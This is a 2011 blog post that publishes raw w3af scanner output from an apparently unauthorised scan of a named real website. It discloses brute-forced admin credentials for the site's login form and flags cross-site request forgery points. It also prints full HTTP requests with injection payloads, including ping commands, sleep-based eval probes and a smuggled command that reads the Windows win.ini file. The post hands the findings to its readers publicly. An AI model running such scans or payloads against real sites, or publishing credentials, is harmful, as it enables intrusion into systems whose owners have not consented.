Monday, June 6, 2011

Vulnerability in www.dait.mx/index.php/customer/account/login/

Greetings, Free World.

[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.error500
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.getMails
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.lang
[Mon 06 Jun 2011 08:59:22 PM CDT] The server header for the remote web server is: "Apache". This information was found in the request with id 943.
[Mon 06 Jun 2011 08:59:22 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.17". This information was found in the request with id 944.
[Mon 06 Jun 2011 08:59:35 PM CDT] Starting formAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:35 PM CDT] No password profiling information collected, please try to enable webSpider plugin and try again.
[Mon 06 Jun 2011 08:59:41 PM CDT] Found a form login. The action of the form is: "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:41 PM CDT] The username field to be used is: "login[username]".
[Mon 06 Jun 2011 08:59:41 PM CDT] The password field to be used is: "login[password]".
[Mon 06 Jun 2011 08:59:41 PM CDT] Starting form authentication bruteforce on URL: "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:42 PM CDT] localCache.py : Could not open cache for request.
[Mon 06 Jun 2011 08:59:46 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.
[Mon 06 Jun 2011 08:59:47 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 995.
[Mon 06 Jun 2011 08:59:50 PM CDT] Finished bruteforcing "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting basicAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting formAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting basicAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Found 4 URLs and 5 different points of injection.
[Mon 06 Jun 2011 08:59:50 PM CDT] The list of URLs is:
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/login/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/newsletter/subscriber/new/
[Mon 06 Jun 2011 08:59:50 PM CDT] The list of fuzzable requests is:
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/ | Method: GET | Parameters: (q="")
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/login/ | Method: GET
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/ | Method: GET
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/ | Method: POST | Parameters: (login[username]="", login[password]="")
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/newsletter/subscriber/new/ | Method: POST | Parameters: (email="")
[Mon 06 Jun 2011 09:00:00 PM CDT] The web application sent a persistent cookie.
[Mon 06 Jun 2011 09:00:00 PM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 06 Jun 2011 09:00:00 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/
[Mon 06 Jun 2011 09:00:00 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Mon 06 Jun 2011 09:00:00 PM CDT] - The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: http://www.dait.mx/index.php/catalogsearch/result/ is vulnerable to cross site request forgery.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Mon 06 Jun 2011 09:01:02 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.
[Mon 06 Jun 2011 09:01:02 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.17". This information was found in the request with id 944.
[Mon 06 Jun 2011 09:01:02 PM CDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 946 and 947.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:27 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 949.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:30 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 950.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:31 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 951.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/login/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:33 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 952.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/loginPost/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:52 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1003.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/newsletter/subscriber/new/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:56 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1005.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/catalogsearch/result/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 03:00:01 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1009.

formAuthBrute:auth:Guessable credentials

Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.

POST http://www.dait.mx/index.php/customer/account/loginPost/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Content-type: application/x-www-form-urlencoded

login%5Busername%5D=admin&login%5Bpassword%5D=55555

Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 995.

xsrf:get_xsrf:Cross site request forgery vulnerability

The URL: http://www.dait.mx/index.php/catalogsearch/result/ is vulnerable to cross site request forgery.

post_xsrf:Cross site site request forgery vulnerability

The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

osCommanding:Possible OS commanding vulnerability

A possible OS Commanding was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=ping+-n+3+localhost".Please review manually. This information was found in the request with id 1227.

GET http://www.dait.mx/index.php/catalogsearch/result/?q=ping+-n+3+localhost HTTP/1.1
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


A possible OS Commanding was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=ping+-c+9+localhost".Please review manually. This information was found in the request with id 1229.

A possible OS Commanding was found at: "http://www.dait.mx/index.php/customer/account/loginPost/", using HTTP method POST. The sent post-data was: "login%5Busername%5D=/usr/sbin/ping+-s+localhost+1000+10+&login%5Bpassword%5D=FrAmE30.". The modified parameter was "login[username]".Please review manually. This information was found in the request with id 1263.

eval:eval:eval()input injection vulnerability

eval() input injection was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 1494.

GET http://www.dait.mx/index.php/catalogsearch/result/?q=import+time%3Btime.sleep(9)%3B HTTP/1.1
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)

eval() input injection was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=sleep(9)%3B". . Please review manually. This information was found in the request with id 1495.

eval() input injection was found at: "http://www.dait.mx/index.php/customer/account/loginPost/", using HTTP method POST. The sent post-data was: "login%5Busername%5D=Thread.Sleep(9000)%3B&login%5Bpassword%5D=FrAmE30.". The modified parameter was "login[username]". . Please review manually. This information was found in the request with id 1533.

error500:error500:Unhandled error in web application

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1320.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1323.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1321.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1324.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1325.

POST http://www.dait.mx/index.php/customer/account/loginPost/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Content-type: application/x-www-form-urlencoded

login%5Busername%5D=John&login%5Bpassword%5D=%3Btype+%25SYSTEMROOT%25%5Cwin.ini



There they are; I leave them with you.

Greetings, Free World.